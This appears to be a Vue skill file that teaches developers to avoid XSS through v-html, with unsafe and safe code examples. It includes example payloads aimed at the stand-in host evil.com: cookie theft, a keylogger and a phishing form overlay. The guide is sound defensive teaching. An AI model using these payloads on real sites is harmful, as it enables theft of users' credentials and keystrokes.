f5792c40be
Pulled ALL skills from 15 source repositories: - anthropics/skills: 16 (docs, design, MCP, testing) - obra/superpowers: 14 (TDD, debugging, agents, planning) - coreyhaines31/marketingskills: 25 (marketing, CRO, SEO, growth) - better-auth/skills: 5 (auth patterns) - vercel-labs/agent-skills: 5 (React, design, Vercel) - antfu/skills: 16 (Vue, Vite, Vitest, pnpm, Turborepo) - Plus 13 individual skills from various repos Mosaic Stack is not limited to coding — the Orchestrator and subagents serve coding, business, design, marketing, writing, logistics, analysis, and more. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
3.3 KiB
3.3 KiB
title, impact, impactDescription, type, tags
| title | impact | impactDescription | type | tags | |||||
|---|---|---|---|---|---|---|---|---|---|
| Never Use v-html with User-Provided Content | HIGH | Using v-html with untrusted content leads to XSS vulnerabilities | capability |
|
Never Use v-html with User-Provided Content
Impact: HIGH - Dynamically rendering arbitrary HTML with v-html can lead to Cross-Site Scripting (XSS) vulnerabilities. Attackers can inject malicious scripts that execute in users' browsers, stealing credentials or performing actions on their behalf.
The v-html directive renders raw HTML without sanitization. While useful for trusted content, it bypasses Vue's automatic text escaping and should never be used with user input.
Task Checklist
- Never use
v-htmlwith user-provided content - Prefer text interpolation
{{ }}which automatically escapes HTML - Use components for template composition instead of
v-html - If raw HTML is absolutely needed, sanitize it with a library like DOMPurify
- Audit existing
v-htmlusage for potential XSS vectors
Incorrect:
<template>
<!-- DANGEROUS: User input rendered as HTML -->
<div v-html="userComment"></div>
<!-- DANGEROUS: Content from API without sanitization -->
<article v-html="articleContent"></article>
<!-- DANGEROUS: URL parameters or form inputs -->
<p v-html="searchQuery"></p>
</template>
<script setup>
import { ref } from 'vue'
// This could contain: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
const userComment = ref(props.comment)
</script>
Correct:
<template>
<!-- SAFE: Text interpolation escapes HTML -->
<div>{{ userComment }}</div>
<!-- SAFE: Use components for rich content -->
<CommentRenderer :content="userComment" />
<!-- SAFE: Only use v-html with trusted, sanitized content -->
<div v-html="sanitizedContent"></div>
</template>
<script setup>
import { computed } from 'vue'
import DOMPurify from 'dompurify'
const props = defineProps(['comment', 'trustedHtml'])
// Option 1: Use text interpolation (recommended)
const userComment = computed(() => props.comment)
// Option 2: Sanitize if raw HTML is truly needed
const sanitizedContent = computed(() =>
DOMPurify.sanitize(props.trustedHtml)
)
</script>
When v-html Is Acceptable
<template>
<!-- OK: Static HTML from your own codebase -->
<div v-html="staticLegalDisclaimer"></div>
<!-- OK: Content from trusted CMS with sanitization -->
<article v-html="sanitizedCmsContent"></article>
</template>
<script setup>
// Content you control, not user input
const staticLegalDisclaimer = `
<p>Terms and conditions apply.</p>
<a href="/legal">Read more</a>
`
</script>
XSS Attack Examples
Attackers can inject various payloads:
<!-- Cookie theft -->
<img src="x" onerror="fetch('https://evil.com?c='+document.cookie)">
<!-- Keylogging -->
<script>document.onkeypress=function(e){fetch('https://evil.com?k='+e.key)}</script>
<!-- Phishing overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%">
<form action="https://evil.com/steal">Login required...</form>
</div>